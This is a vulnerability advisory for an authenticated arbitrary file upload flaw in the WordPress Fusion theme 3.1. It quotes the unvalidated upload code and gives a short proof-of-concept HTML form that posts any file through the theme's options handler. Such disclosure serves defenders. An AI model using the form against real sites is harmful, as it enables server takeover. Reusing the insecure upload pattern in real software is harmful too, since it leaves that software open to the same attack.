WordPress Fusion theme version 3.1 suffers from a remote file upload vulnerability.
7e949922af7e084f3e5004bd72e715be162526c75d9eeb904ce6040f218ca1c7
------------------------------------------------------------------------------
WordPress Fusion Theme Authenicated Arbitrary File Upload
------------------------------------------------------------------------------
[-] Theme Link:
https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/
[-] Affected Version:
Version 3.1
[-] Vulnerability Description:
The vulnerable code is located in the /functions script:
//SHORTENED CODE
function fusion_options() {
if ( 'fusion_save' == $_REQUEST['action'] ) {
if ($_FILES["file-logo"]["type"]){
$directory = $uploadpath['basedir'].'/';
move_uploaded_file($_FILES["file-logo"]["tmp_name"],
$directory . $_FILES["file-logo"]["name"]);
update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
$_FILES["file-logo"]["name"]);
}
}
add_action('admin_menu', 'fusion_options');
then function fusion_options can be called by LOGGED IN USERS and executed
which leads to uploading any file on attacked server which may cause the
site full take over.
[-] Proof of Concept:
<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
<input type="file" name="file-logo" />
<input type="hidden" name="action" value="fusion_save" />
<button type="submit" >Upload</button>
</form>